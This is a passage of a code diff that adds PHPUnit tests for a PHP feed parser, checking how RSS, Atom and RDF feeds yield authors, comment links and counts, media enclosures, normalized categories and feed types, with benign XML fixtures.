+          length="1234567"/>
+    <id>atom-id-5</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_CATEGORIES = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:dc="http://purl.org/dc/elements/1.1/">
+  <title>Test</title>
+  <entry>
+    <title>Atom Categories</title>
+    <link href="https://example.com/atom/6" rel="alternate"/>
+    <id>atom-id-6</id>
+    <category term="News" scheme="http://example.com/scheme"/>
+    <category term="Politics"/>
+    <dc:subject>World</dc:subject>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_AUTHOR = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Author Atom</title>
+    <link href="https://example.com/atom/7" rel="alternate"/>
+    <id>atom-id-7</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // get_author() — RSS
+    // =========================================================================
+
+    public function test_rss_get_author_with_name_and_email(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertCount(1, $items);
+        $this->assertEquals("Alice Smith", $items[0]->get_author());
+    }
+
+    public function test_rss_get_author_name_only(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_AUTHOR_NAME_ONLY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("Bob Jones", $items[0]->get_author());
+    }
+
+    public function test_rss_get_author_email_only(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_AUTHOR_EMAIL_ONLY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("bob@example.com", $items[0]->get_author());
+    }
+
+    public function test_rss_get_author_text_only(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_AUTHOR_TEXT_ONLY);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("Charlie Brown", $items[0]->get_author());
+    }
+
+    public function test_rss_get_author_dc_creator_single(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_DC_CREATOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        // dc:creator should be used when no <author> element exists
+        $this->assertEquals("Dave Author, Eve Writer", $items[0]->get_author());
+    }
+
+    public function test_rss_get_author_none(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("", $items[0]->get_author());
+    }
+
+    // =========================================================================
+    // get_author() — Atom
+    // =========================================================================
+
+    public function test_atom_get_author(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("Atom Author", $items[0]->get_author());
+    }
+
+    public function test_atom_get_author_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("", $items[0]->get_author());
+    }
+
+    // =========================================================================
+    // get_author() — HTML entity / special character handling
+    // =========================================================================
+
+    public function test_rss_get_author_with_html_entities(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Entity Test</title>
+      <author><name>John &amp; Jane Doe</name></author>
+      <link>https://example.com/entities</link>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("John & Jane Doe", $items[0]->get_author());
+    }
+
+    // =========================================================================
+    // get_comments_url()
+    // =========================================================================
+
+    public function test_rss_get_comments_url(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_COMMENTS);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("https://example.com/7/comments", $items[0]->get_comments_url());
+    }
+
+    public function test_rss_get_comments_url_none(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("", $items[0]->get_comments_url());
+    }
+
+    public function test_atom_get_comments_url_replies(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_REPLIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("https://example.com/atom/2/replies", $items[0]->get_comments_url());
+    }
+
+    // =========================================================================
+    // get_comments_count()
+    // =========================================================================
+
+    public function test_rss_get_comments_count_slash(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_COMMENTS_COUNT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals(42, $items[0]->get_comments_count());
+    }
+
+    public function test_atom_get_comments_count_thread(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_THREADED_REPLIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals(7, $items[0]->get_comments_count());
+    }
+
+    public function test_rss_get_comments_count_none(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals(0, $items[0]->get_comments_count());
+    }
+
+    public function test_atom_get_comments_count_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals(0, $items[0]->get_comments_count());
+    }
+
+    // =========================================================================
+    // get_enclosures() — Media RSS
+    // =========================================================================
+
+    public function test_rss_get_enclosures_media_content(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_MEDIA_CONTENT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/video.mp4", $encs[0]->link);
+        $this->assertEquals("video/mp4", $encs[0]->type);
+        $this->assertEquals("123456", $encs[0]->length);
+        $this->assertEquals("720", $encs[0]->height);
+        $this->assertEquals("1280", $encs[0]->width);
+        $this->assertEquals("Video description", $encs[0]->title);
+    }
+
+    public function test_rss_get_enclosures_media_thumbnail(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_MEDIA_THUMBNAIL);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/thumb.jpg", $encs[0]->link);
+        $this->assertEquals("image/generic", $encs[0]->type);
+        $this->assertEquals("360", $encs[0]->height);
+        $this->assertEquals("640", $encs[0]->width);
+    }
+
+    public function test_rss_get_enclosures_rss_enclosure(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_ENCLOSURE);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/audio.mp3", $encs[0]->link);
+        $this->assertEquals("audio/mpeg", $encs[0]->type);
+        $this->assertEquals("987654", $encs[0]->length);
+    }
+
+    public function test_rss_get_enclosures_media_and_rss_combined(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:media="http://search.yahoo.com/mrss/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Combined Enclosures</title>
+      <link>https://example.com/combined</link>
+      <enclosure url="https://example.com/audio.mp3"
+                 type="audio/mpeg"
+                 length="1000"/>
+      <media:content url="https://example.com/video.mp4"
+                     type="video/mp4"/>
+      <media:thumbnail url="https://example.com/thumb.jpg"/>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        // RSS enclosure + media:content + media:thumbnail = 3
+        $this->assertCount(3, $encs);
+    }
+
+    public function test_atom_get_enclosures_media_content(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_MEDIA_CONTENT);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/atom-video.mp4", $encs[0]->link);
+        $this->assertEquals("video/mp4", $encs[0]->type);
+    }
+
+    public function test_atom_get_enclosures_enclosure_link(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_ENCLOSURE_LINK);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/atom-podcast.mp3", $encs[0]->link);
+        $this->assertEquals("audio/mpeg", $encs[0]->type);
+        $this->assertEquals("1234567", $encs[0]->length);
+    }
+
+    public function test_rss_get_enclosures_none(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertEmpty($encs);
+    }
+
+    public function test_atom_get_enclosures_none(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertEmpty($encs);
+    }
+
+    // =========================================================================
+    // get_enclosures() — media:group
+    // =========================================================================
+
+    public function test_rss_get_enclosures_media_group(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:media="http://search.yahoo.com/mrss/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Media Group</title>
+      <link>https://example.com/group</link>
+      <media:group>
+        <media:content url="https://example.com/highres.jpg"
+                       type="image/jpeg"
+                       height="1080"
+                       width="1920"/>
+        <media:description>High resolution image</media:description>
+      </media:group>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("https://example.com/highres.jpg", $encs[0]->link);
+        $this->assertEquals("image/jpeg", $encs[0]->type);
+        $this->assertEquals("1080", $encs[0]->height);
+        $this->assertEquals("1920", $encs[0]->width);
+        $this->assertEquals("High resolution image", $encs[0]->title);
+    }
+
+    // =========================================================================
+    // get_enclosures() — medium attribute fallback
+    // =========================================================================
+
+    public function test_rss_get_enclosures_medium_attribute(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:media="http://search.yahoo.com/mrss/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Medium Attribute</title>
+      <link>https://example.com/medium</link>
+      <media:content medium="video" url="https://example.com/video.webm"/>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("video/generic", $encs[0]->type);
+    }
+
+    // =========================================================================
+    // normalize_categories() — static method
+    // =========================================================================
+
+    /**
+     * Helper: check that two arrays have the same values (order-independent),
+     * since normalize_categories uses asort() which may behave differently
+     * depending on locale and preserves keys from array_filter.
+     *
+     * @param list<string> $expected
+     * @param list<string> $actual
+     */
+    private function assertNormalizeCategoriesEquals(array $expected, array $actual): void {
+        $expectedSorted = $expected;
+        $actualSorted = $actual;
+        sort($expectedSorted);
+        sort($actualSorted);
+        $this->assertEquals($expectedSorted, $actualSorted);
+    }
+
+    public function test_normalize_categories_simple(): void {
+        $result = FeedItem_Common::normalize_categories(["Technology", "Programming"]);
+        $this->assertNormalizeCategoriesEquals(["programming", "technology"], $result);
+    }
+
+    public function test_normalize_categories_csv_split(): void {
+        $result = FeedItem_Common::normalize_categories(["Tech, Programming"]);
+        $this->assertNormalizeCategoriesEquals(["programming", "tech"], $result);
+    }
+
+    public function test_normalize_categories_csv_multiple(): void {
+        $result = FeedItem_Common::normalize_categories(["A, B", "C, D"]);
+        $this->assertNormalizeCategoriesEquals(["a", "b", "c", "d"], $result);
+    }
+
+    public function test_normalize_categories_numeric_prefix(): void {
+        $result = FeedItem_Common::normalize_categories(["123", "456"]);
+        $this->assertNormalizeCategoriesEquals(["t:123", "t:456"], $result);
+    }
+
+    public function test_normalize_categories_lowercase(): void {
+        $result = FeedItem_Common::normalize_categories(["Technology", "PROGRAMMING"]);
+        $this->assertNormalizeCategoriesEquals(["programming", "technology"], $result);
+    }
+
+    public function test_normalize_categories_strip_quotes(): void {
+        $result = FeedItem_Common::normalize_categories(["'Tech'", '"Web"']);
+        $this->assertNormalizeCategoriesEquals(["tech", "web"], $result);
+    }
+
+    public function test_normalize_categories_trim_whitespace(): void {
+        $result = FeedItem_Common::normalize_categories(["  Technology  "]);
+        $this->assertEquals(["technology"], $result);
+    }
+
+    public function test_normalize_categories_truncate_long(): void {
+        $long = str_repeat("a", 300);
+        $result = FeedItem_Common::normalize_categories([$long]);
+        $this->assertEquals(250, mb_strlen($result[0]));
+    }
+
+    public function test_normalize_categories_remove_empty(): void {
+        $result = FeedItem_Common::normalize_categories(["", "  ", "Valid"]);
+        $this->assertCount(1, $result);
+        $this->assertEquals("valid", array_values($result)[0]);
+    }
+
+    public function test_normalize_categories_empty_input(): void {
+        $result = FeedItem_Common::normalize_categories([]);
+        $this->assertEmpty($result);
+    }
+
+    public function test_normalize_categories_dedup(): void {
+        $result = FeedItem_Common::normalize_categories(["Tech", "tech", "TECH"]);
+        $this->assertEquals(["tech"], $result);
+    }
+
+    public function test_normalize_categories_mixed(): void {
+        $result = FeedItem_Common::normalize_categories(["News, Politics", "world", "123"]);
+        $this->assertNormalizeCategoriesEquals(["news", "politics", "t:123", "world"], $result);
+    }
+
+    // =========================================================================
+    // count_children()
+    // =========================================================================
+
+    public function test_count_children_empty(): void {
+        $doc = new DOMDocument();
+        $doc->appendChild($doc->createElement("root"));
+        $root = $doc->documentElement;
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $parser->init();
+        $items = $parser->get_items();
+        // FeedItem_Common is abstract, use FeedItem_RSS
+        $common = $items[0];
+        // Use reflection to access protected count_children
+        $ref = new ReflectionMethod($common, "count_children");
+        $ref->setAccessible(true);
+        $this->assertEquals(0, $ref->invoke($common, $root));
+    }
+
+    public function test_count_children_with_siblings(): void {
+        $doc = new DOMDocument();
+        $parent = $doc->createElement("parent");
+        $parent->appendChild($doc->createElement("child1"));
+        $parent->appendChild($doc->createElement("child2"));
+        $parent->appendChild($doc->createElement("child3"));
+        $doc->appendChild($parent);
+
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $parser->init();
+        $items = $parser->get_items();
+        $common = $items[0];
+        $ref = new ReflectionMethod($common, "count_children");
+        $ref->setAccessible(true);
+        $this->assertEquals(3, $ref->invoke($common, $parent));
+    }
+
+    // =========================================================================
+    // subtree_or_text()
+    // =========================================================================
+
+    public function test_subtree_or_text_leaf_node(): void {
+        $doc = new DOMDocument();
+        $node = $doc->createElement("title", "Simple Title");
+        $doc->appendChild($node);
+
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $parser->init();
+        $items = $parser->get_items();
+        $common = $items[0];
+        $ref = new ReflectionMethod($common, "subtree_or_text");
+        $ref->setAccessible(true);
+        $result = $ref->invoke($common, $node);
+        $this->assertEquals("Simple Title", $result);
+    }
+
+    public function test_subtree_or_text_element_with_children(): void {
+        $doc = new DOMDocument();
+        $node = $doc->createElement("content");
+        $text = $doc->createTextNode("Hello ");
+        $bold = $doc->createElement("b");
+        $bold->appendChild($doc->createTextNode("world"));
+        $node->appendChild($text);
+        $node->appendChild($bold);
+        $doc->appendChild($node);
+
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $parser->init();
+        $items = $parser->get_items();
+        $common = $items[0];
+        $ref = new ReflectionMethod($common, "subtree_or_text");
+        $ref->setAccessible(true);
+        $result = $ref->invoke($common, $node);
+        $this->assertNotEquals("Hello world", $result);
+        // Should return c14n serialized XML, not plain text
+        $this->assertStringContainsString("<b>", $result);
+    }
+
+    // =========================================================================
+    // get_element()
+    // =========================================================================
+
+    public function test_get_element_returns_dom_element(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_NO_AUTHOR);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        // get_element is defined in FeedItem_Common, not abstract FeedItem
+        /** @var \FeedItem_Common $item */
+        $item = $items[0];
+        $elem = $item->get_element();
+        $this->assertInstanceOf(DOMElement::class, $elem);
+        $this->assertEquals("item", $elem->tagName);
+    }
+
+    // =========================================================================
+    // Source element removal in constructor
+    // =========================================================================
+
+    public function test_constructor_removes_source_element(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_SOURCE_REMOVED);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        // get_element is defined in FeedItem_Common, not abstract FeedItem
+        /** @var \FeedItem_Common $item */
+        $item = $items[0];
+        $elem = $item->get_element();
+        $sources = $elem->getElementsByTagName("source");
+        $this->assertEquals(0, $sources->length);
+    }
+
+    // =========================================================================
+    // get_categories() — via normalize_categories (common logic)
+    // =========================================================================
+
+    public function test_rss_get_categories(): void {
+        $parser = new FeedParser(self::RSS2_ITEM_CATEGORIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $cats = $items[0]->get_categories();
+        $this->assertNormalizeCategoriesEquals(["design", "programming", "technology", "web"], $cats);
+    }
+
+    public function test_atom_get_categories(): void {
+        $parser = new FeedParser(self::ATOM1_ITEM_CATEGORIES);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $cats = $items[0]->get_categories();
+        $this->assertEquals(["news", "politics", "world"], $cats);
+    }
+
+    // =========================================================================
+    // get_author() — dc:creator fallback when <author> has no name/email
+    // =========================================================================
+
+    public function test_rss_get_author_author_element_no_name_or_email(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Author Fallback</title>
+      <author><someOtherElement>value</someOtherElement></author>
+      <link>https://example.com/fallback</link>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        // <author> exists but has no name/email child; nodeValue returns
+        // the concatenated text of child nodes ("value"), so that is returned
+        $this->assertEquals("value", $items[0]->get_author());
+    }
+
+    // =========================================================================
+    // get_comments_count() — non-numeric value
+    // =========================================================================
+
+    public function test_get_comments_count_non_numeric(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Non-numeric Comments</title>
+      <link>https://example.com/nonnumeric</link>
+      <slash:comments>many</slash:comments>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals(0, $items[0]->get_comments_count());
+    }
+
+    // =========================================================================
+    // get_enclosures() — media:content with medium fallback
+    // =========================================================================
+
+    public function test_get_enclosures_media_content_no_type(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:media="http://search.yahoo.com/mrss/">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>No Type</title>
+      <link>https://example.com/no-type</link>
+      <media:content url="https://example.com/file.bin" medium="application"/>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $encs = $items[0]->get_enclosures();
+        $this->assertCount(1, $encs);
+        $this->assertEquals("application/generic", $encs[0]->type);
+    }
+
+    // =========================================================================
+    // get_comments_url() — atom:link rel=replies in RSS
+    // =========================================================================
+
+    public function test_rss_get_comments_url_atom_replies(): void {
+        $xml = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0"
+     xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Test</title>
+    <item>
+      <title>Atom Replies in RSS</title>
+      <link>https://example.com/atom-replies</link>
+      <atom:link href="https://example.com/atom-replies/comments"
+                 rel="replies"
+                 type="text/html"/>
+    </item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $this->assertTrue($parser->init());
+        $items = $parser->get_items();
+        $this->assertEquals("https://example.com/atom-replies/comments", $items[0]->get_comments_url());
+    }
+}

--- a/tests_functional/FeedParserTest.php
+++ b/tests_functional/FeedParserTest.php
@@ -1,0 +1,496 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+final class FeedParserTest extends TestCase {
+
+    // ------------------------------------------------------------------------
+    // XML fixtures
+    // ------------------------------------------------------------------------
+
+    private const RSS2_XML = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Test RSS Feed</title>
+    <link>https://example.com/rss</link>
+    <item>
+      <title>Article One</title>
+      <link>https://example.com/article/1</link>
+      <guid>guid-1</guid>
+    </item>
+    <item>
+      <title>Article Two</title>
+      <link>https://example.com/article/2</link>
+      <guid>guid-2</guid>
+    </item>
+  </channel>
+</rss>';
+
+    private const RSS2_WITH_LINK_ATTR = '<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+  <channel>
+    <title>Channel With Attr Link</title>
+    <link href="https://example.com/attr-link"/>
+    <item>
+      <title>Item</title>
+      <link>https://example.com/item</link>
+    </item>
+  </channel>
+</rss>';
+
+    private const ATOM1_XML = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test Atom Feed</title>
+  <link href="https://example.com/atom"/>
+  <entry>
+    <title>Atom Entry One</title>
+    <link href="https://example.com/entry/1" rel="alternate"/>
+    <id>atom-entry-1</id>
+  </entry>
+  <entry>
+    <title>Atom Entry Two</title>
+    <link href="https://example.com/entry/2" rel="alternate"/>
+    <id>atom-entry-2</id>
+  </entry>
+</feed>';
+
+    private const ATOM03_XML = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://purl.org/atom/ns#" version="0.3">
+  <title>Test Atom 0.3 Feed</title>
+  <link href="https://example.com/atom03" rel="alternate"/>
+  <entry>
+    <title>Atom 0.3 Entry</title>
+    <link href="https://example.com/atom03-entry" rel="alternate"/>
+  </entry>
+</feed>';
+
+    private const RDF_XML = '<?xml version="1.0" encoding="UTF-8"?>
+<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+         xmlns="http://purl.org/rss/1.0/">
+  <channel RDF:about="https://example.com/rdf">
+    <title>RDF Feed Title</title>
+    <link>https://example.com/rdf</link>
+  </channel>
+  <item RDF:about="https://example.com/rdf-item">
+    <title>RDF Item</title>
+    <link>https://example.com/rdf-item-link</link>
+  </item>
+</RDF:RDF>';
+
+    private const MALFORMED_XML = '<?xml version="1.0"?>
+<rss><channel><title>Unclosed';
+
+    private const UNKNOWN_FEED = '<?xml version="1.0"?>
+<unknown>
+  <data>Not a feed</data>
+</unknown>';
+
+    private const ATOM_WITH_MULTIPLE_LINKS = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Multi Link Feed</title>
+  <link href="https://example.com/atom" rel="alternate"/>
+  <link href="https://example.com/atom/feed.xml" rel="self"/>
+  <link href="https://example.com/atom/prev" rel="prev"/>
+  <entry>
+    <title>Entry</title>
+  </entry>
+</feed>';
+
+    // ------------------------------------------------------------------------
+    // Constructor — error handling
+    // ------------------------------------------------------------------------
+
+    public function test_constructor_malformed_xml_sets_error(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $this->assertFalse($parser->init());
+        $this->assertNotEmpty($parser->error());
+    }
+
+    public function test_constructor_malformed_xml_returns_errors_array(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $errors = $parser->errors();
+        $this->assertNotEmpty($errors);
+    }
+
+    public function test_constructor_unknown_feed_type_no_parse_error(): void {
+        $parser = new FeedParser(self::UNKNOWN_FEED);
+        // No XML parse error, but type will be FEED_UNKNOWN
+        $this->assertEquals(FeedParser::FEED_UNKNOWN, $parser->get_type());
+        $this->assertNotEmpty($parser->error());
+    }
+
+    // ------------------------------------------------------------------------
+    // Constructor — valid feeds produce no parse error
+    // ------------------------------------------------------------------------
+
+    public function test_constructor_rss2_no_error(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $this->assertEmpty($parser->error());
+    }
+
+    public function test_constructor_atom1_no_error(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $this->assertEmpty($parser->error());
+    }
+
+    public function test_constructor_atom03_no_error(): void {
+        $parser = new FeedParser(self::ATOM03_XML);
+        $this->assertEmpty($parser->error());
+    }
+
+    public function test_constructor_rdf_no_error(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $this->assertEmpty($parser->error());
+    }
+
+    // ------------------------------------------------------------------------
+    // get_type() — feed detection
+    // ------------------------------------------------------------------------
+
+    public function test_get_type_rss2(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $parser->init();
+        $this->assertEquals(FeedParser::FEED_RSS, $parser->get_type());
+    }
+
+    public function test_get_type_atom1(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $parser->init();
+        $this->assertEquals(FeedParser::FEED_ATOM, $parser->get_type());
+    }
+
+    public function test_get_type_atom03(): void {
+        $parser = new FeedParser(self::ATOM03_XML);
+        $parser->init();
+        $this->assertEquals(FeedParser::FEED_ATOM, $parser->get_type());
+    }
+
+    public function test_get_type_rdf(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $parser->init();
+        $this->assertEquals(FeedParser::FEED_RDF, $parser->get_type());
+    }
+
+    public function test_get_type_unknown(): void {
+        $parser = new FeedParser(self::UNKNOWN_FEED);
+        $this->assertEquals(FeedParser::FEED_UNKNOWN, $parser->get_type());
+    }
+
+    public function test_get_type_malformed(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $this->assertEquals(FeedParser::FEED_UNKNOWN, $parser->get_type());
+    }
+
+    // ------------------------------------------------------------------------
+    // init() — success/failure
+    // ------------------------------------------------------------------------
+
+    public function test_init_rss2_returns_true(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $this->assertTrue($parser->init());
+    }
+
+    public function test_init_atom1_returns_true(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $this->assertTrue($parser->init());
+    }
+
+    public function test_init_atom03_returns_true(): void {
+        $parser = new FeedParser(self::ATOM03_XML);
+        $this->assertTrue($parser->init());
+    }
+
+    public function test_init_rdf_returns_true(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $this->assertTrue($parser->init());
+    }
+
+    public function test_init_malformed_returns_false(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $this->assertFalse($parser->init());
+    }
+
+    public function test_init_unknown_type_returns_false(): void {
+        $parser = new FeedParser(self::UNKNOWN_FEED);
+        $this->assertFalse($parser->init());
+    }
+
+    // ------------------------------------------------------------------------
+    // get_title()
+    // ------------------------------------------------------------------------
+
+    public function test_get_title_rss2(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $parser->init();
+        $this->assertEquals("Test RSS Feed", $parser->get_title());
+    }
+
+    public function test_get_title_atom1(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $parser->init();
+        $this->assertEquals("Test Atom Feed", $parser->get_title());
+    }
+
+    public function test_get_title_atom03(): void {
+        $parser = new FeedParser(self::ATOM03_XML);
+        $parser->init();
+        $this->assertEquals("Test Atom 0.3 Feed", $parser->get_title());
+    }
+
+    public function test_get_title_rdf(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $parser->init();
+        $this->assertEquals("RDF Feed Title", $parser->get_title());
+    }
+
+    public function test_get_title_malformed(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $this->assertEquals("", $parser->get_title());
+    }
+
+    public function test_get_title_unknown_type(): void {
+        $parser = new FeedParser(self::UNKNOWN_FEED);
+        $this->assertEquals("", $parser->get_title());
+    }
+
+    // ------------------------------------------------------------------------
+    // get_link()
+    // ------------------------------------------------------------------------
+
+    public function test_get_link_rss2(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $parser->init();
+        $this->assertEquals("https://example.com/rss", $parser->get_link());
+    }
+
+    public function test_get_link_rss2_with_attr(): void {
+        $parser = new FeedParser(self::RSS2_WITH_LINK_ATTR);
+        $parser->init();
+        $this->assertEquals("https://example.com/attr-link", $parser->get_link());
+    }
+
+    public function test_get_link_atom1(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $parser->init();
+        $this->assertEquals("https://example.com/atom", $parser->get_link());
+    }
+
+    public function test_get_link_atom03(): void {
+        $parser = new FeedParser(self::ATOM03_XML);
+        $parser->init();
+        $this->assertEquals("https://example.com/atom03", $parser->get_link());
+    }
+
+    public function test_get_link_rdf(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $parser->init();
+        $this->assertEquals("https://example.com/rdf", $parser->get_link());
+    }
+
+    public function test_get_link_malformed(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $this->assertEquals("", $parser->get_link());
+    }
+
+    // ------------------------------------------------------------------------
+    // get_items()
+    // ------------------------------------------------------------------------
+
+    public function test_get_items_rss2_count(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        $this->assertCount(2, $items);
+    }
+
+    public function test_get_items_atom1_count(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        $this->assertCount(2, $items);
+    }
+
